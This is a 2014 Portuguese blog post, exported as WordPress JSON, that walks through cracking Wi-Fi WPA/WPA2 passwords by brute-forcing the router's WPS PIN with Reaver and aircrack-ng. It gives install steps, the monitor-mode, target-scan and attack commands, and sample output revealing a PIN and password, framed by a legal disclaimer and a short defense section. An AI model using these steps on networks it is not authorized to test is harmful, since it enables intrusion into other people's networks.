{"id":956,"date":"2014-08-02T16:06:21","date_gmt":"2014-08-02T19:06:21","guid":{"rendered":"http:\/\/www.viazap.com.br\/?p=956"},"modified":"2014-08-02T16:06:21","modified_gmt":"2014-08-02T19:06:21","slug":"reaver-descobrindo-senhas-wi-fi","status":"publish","type":"post","link":"https:\/\/blog.clusterweb.com.br\/?p=956","title":{"rendered":"Reaver &#8211; Descobrindo senhas Wi-Fi"},"content":{"rendered":"<p><b style=\"color: #000000;\">Sobre o Reaver<\/b><span style=\"color: #000000;\">\u00a0<\/span><br style=\"color: #000000;\" \/><br style=\"color: #000000;\" \/><\/p>\n<div style=\"color: #000000;\">\n<h1>Considera\u00e7\u00f5es iniciais<\/h1>\n<p>A finalidade deste artigo, \u00e9 apenas did\u00e1tica. Como todos aqui sabem, invas\u00e3o \u00e9 crime e o autor pode responder e pegar at\u00e9 1 ano de pris\u00e3o (mais detalhes\u00a0<a href=\"http:\/\/g1.globo.com\/politica\/noticia\/2012\/10\/senado-aprova-projeto-que-torna-crime-invasao-de-computadores.html\">aqui<\/a>).<\/p>\n<p>Todos os testes foram feitos em minha rede particular. N\u00e3o me responsabilizo pelo mau uso do mesmo.<\/p>\n<p>Utilizei o Ubuntu 13.10.<\/p>\n<h1>O que \u00e9 Reaver?<\/h1>\n<p>Reaver \u00e9 uma ferramenta que pode ser utilizada para explorar uma<br \/>\nvulnerabilidade do protocolo WPS, utilizado pelas chaves do tipo WPA e WPA2, a fim de resgatar a senha configurada no aparelho roteador.<\/p>\n<p>Ele realiza um ataque de\u00a0brute force\u00a0sobre o c\u00f3digo PIN do roteador que \u00e9 composto por 8 caracteres num\u00e9ricos, onde o \u00faltimo \u00e9 apenas um d\u00edgito de valida\u00e7\u00e3o composto pela soma dos primeiros.<\/p>\n<p>O PIN code \u00e9 uma identifica\u00e7\u00e3o num\u00e9rica do router. Informando esse c\u00f3digo corretamente para o roteador, ele informa qual a senha e SSID configurados no equipamento, ou seja, o ataque consiste em capturarmos o PIN code para depois obtermos a senha, independente de sua complexidade.<\/p>\n<p>A falha no protocolo WPS e a consequente redu\u00e7\u00e3o de possibilidades num\u00e9ricas, torna poss\u00edvel recuperar a senha entre 4 e 10 horas, ap\u00f3s um certo n\u00famero de combina\u00e7\u00f5es do c\u00f3digo PIN.<\/p>\n<p>Se o ataque de for\u00e7a bruta fosse aplicado diretamente sobre a senha, dependendo de sua complexidade, poderia demorar semanas, at\u00e9 que a senha fosse quebrada, isso se ela existir em seu dicion\u00e1rio. Neste caso, como o ataque \u00e9 feito no PIN code, a complexidade da senha n\u00e3o interfere no tempo de resposta do resultado final.<\/p>\n<h1>M\u00e9todo de defesa<\/h1>\n<p>A melhor contramedida que pode ser adotada para evitar este tipo de ataque, \u00e9 desabilitar o protocolo WPS ou utilizar firmwares atualizados que limitem as mensagens trocadas entre o AP e os destinat\u00e1rios, bloqueando a troca de pacotes ap\u00f3s um certo n\u00famero de tentativas.<!--more--><\/p>\n<h1>Instala\u00e7\u00e3o<\/h1>\n<p>Instalando libs:<\/p>\n<p><strong>$ sudo apt-get update<\/strong><br \/>\n<strong>$ sudo apt-get install build-essential<\/strong><br \/>\n<strong>$ sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libpcap0.8 libsqlite3-0<\/strong><br \/>\n<strong>$ sudo apt-get install libssl-dev<\/strong>\u00a0<span class=\"comentario\"># Usado pelo Aircrack-ng<\/span><\/p>\n<p>Instalando Aircrack-ng:<\/p>\n<p>O Aircrack-ng ser\u00e1 utilizado para manipular a placa de rede Wi-Fi e identificar o BSSID alvo.<\/p>\n<p><strong>$ sudo apt-get install aircrack-ng<\/strong><\/p>\n<p>Caso n\u00e3o exista no reposit\u00f3rio, ser\u00e1 necess\u00e1rio seguir os seguintes passos:<\/p>\n<p><strong>$ wget<\/strong>\u00a0<a href=\"http:\/\/download.aircrack-ng.org\/aircrack-ng-1.1.tar.gz\">http:\/\/download.aircrack-ng.org\/aircrack-ng-1.1.tar.gz<\/a><br \/>\n<strong>$ tar -zxvf aircrack-ng-1.1.tar.gz<\/strong><\/p>\n<p>Edite o arquivo\u00a0common.mak:<\/p>\n<p><strong>$ vi aircrack-ng-1.1\/common.mak<\/strong><\/p>\n<p>Ache a linha abaixo:<\/p>\n<blockquote><p>CFLAGS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0?= -g -W -Wall -Werror -O3<\/p><\/blockquote>\n<p>Remova\u00a0-Werror, conforme abaixo:<\/p>\n<div class=\"codigo\">CFLAGS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0?= -g -W -Wall -O3<\/div>\n<p>Salve o arquivo, monte o pacote e instale:<\/p>\n<p><strong>$ make<\/strong><br \/>\n<strong>$ sudo make install<\/strong><\/p>\n<h1>Instalando o Reaver<\/h1>\n<p><strong>$ sudo apt-get install reaver<\/strong><\/p>\n<p>Caso n\u00e3o exista no reposit\u00f3rio, ser\u00e1 necess\u00e1rio seguir os seguintes passos:<\/p>\n<p><strong>$ wget<\/strong>\u00a0<a href=\"http:\/\/reaver-wps.googlecode.com\/files\/reaver-1.4.tar.gz\">http:\/\/reaver-wps.googlecode.com\/files\/reaver-1.4.tar.gz<\/a><br \/>\n<strong>$ tar -xzvf reaver-1.4.tar.gz<\/strong><br \/>\n<strong>$ cd reaver-1.4<\/strong><br \/>\n<strong>$ cd src<\/strong><br \/>\n<strong>$ .\/configure<\/strong><br \/>\n<strong>$ make<\/strong><br \/>\n<strong>$ sudo make install<\/strong><\/p>\n<p>Para conferir se foi instalado:<\/p>\n<p><strong>$ which reaver<\/strong><\/p>\n<p>O resultado ser\u00e1:<\/p>\n<p><sub>\u00a0\u00a0\/usr\/local\/bin\/reaver\u00a0<\/sub><\/p>\n<p>Tudo pronto para iniciar o ataque.<\/p>\n<h1>Ataque<\/h1>\n<p>Preparando o ataque:<\/p>\n<ul>\n<li>Colocar a placa de rede Wi-Fi em modo monitor com o Aircrack-ng.<\/li>\n<li>Identificar o alvo (capturar o BSSID do router alvo, utilizando tamb\u00e9m o Aircrack-ng).<\/li>\n<li>Atacar (Reaver).<\/li>\n<\/ul>\n<p>Para isso, seguir os passos abaixo:<\/p>\n<p>Encontre o sua interface Wi-Fi:<\/p>\n<p><strong>$ iwconfig<\/strong><\/p>\n<p>Voc\u00ea ver\u00e1 o nome da interface de rede sem fio, por exemplo\u00a0wlan0.<\/p>\n<p>Coloque sua placa Wireless em modo monitor:<\/p>\n<p><strong>$ sudo airmon-ng start wlan0<\/strong><\/p>\n<p>Monitor mode enabled on\u00a0\u2192 que muito provavelmente ser\u00e1\u00a0mon0.<\/p>\n<p>Encontre o BSSID do roteador que voc\u00ea quer crackear:<\/p>\n<p><strong>$ sudo airodump-ng mon0<\/strong><\/p>\n<p>BSSID \u00e9 o MAC address do roteador.<br \/>\nA rede deve ter\u00a0WPA\u00a0ou\u00a0WPA2\u00a0listado na coluna\u00a0ENC.<\/p>\n<p>Ataque:<\/p>\n<p><strong>$ sudo reaver -i mon0 -b 00:00:00:00:00:00 -vv<\/strong><\/p>\n<p>Onde:<\/p>\n<ul>\n<li>-i\u00a0:: interface<\/li>\n<li>-b\u00a0:: BSSID (substituir o &#8220;00:00:00:00:00:00&#8221; pelo alvo)<\/li>\n<li>-vv\u00a0:: verbose (mostrar mensagens)<\/li>\n<\/ul>\n<p>Deixe disparando e aguarde o resultado que ser\u00e1 semelhante ao da imagem:<\/p>\n<div class=\"figura\"><a href=\"http:\/\/img.vivaolinux.com.br\/imagens\/artigos\/comunidade\/reaver.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/img.vivaolinux.com.br\/imagens\/artigos\/comunidade\/thumb_reaver.jpg\" alt=\"Linux: Reaver - Descobrindo senhas Wi-Fi\" width=\"500\" height=\"281\" border=\"0\" \/><\/a><\/div>\n<p>No meu caso, a senha foi quebrada em apenas 2 horas:<\/p>\n<p><sub>\u00a0\u00a0Pin cracked in 7302 seconds<br \/>\nWPS PIN: &#8216;10179178&#8217; (pin code do roteador)<br \/>\nWPA PSK: &#8217;79ri7gse6.c&#8217; (senha revelada!)<br \/>\nAP SSID: GENTIL\u00a0<\/sub><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Sobre o Reaver\u00a0 Considera\u00e7\u00f5es iniciais A finalidade deste artigo, \u00e9 apenas did\u00e1tica. Como todos aqui sabem, invas\u00e3o \u00e9 crime e o autor pode responder e pegar at\u00e9 1 ano de pris\u00e3o (mais detalhes\u00a0aqui). Todos os testes foram feitos em minha rede particular. N\u00e3o me responsabilizo pelo mau uso do mesmo. Utilizei o Ubuntu 13.10. O [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1,42,51,495,514,68,271,548,35],"tags":[681,680,684,682,683],"class_list":["post-956","post","type-post","status-publish","format-standard","hentry","category-viazap","category-leitura-recomendada","category-linux-linuxrs","category-profissional-de-ti","category-programacao","category-redes-2","category-seguranca-2","category-ubuntu-2","category-wireless","tag-descobrindo","tag-reaver","tag-saiba-como","tag-senhas","tag-wi-fi"],"_links":{"self":[{"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/posts\/956","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=956"}],"version-history":[{"count":1,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/posts\/956\/revisions"}],"predecessor-version":[{"id":957,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=\/wp\/v2\/posts\/956\/revisions\/957"}],"wp:attachment":[{"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=956"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=956"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.clusterweb.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=956"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}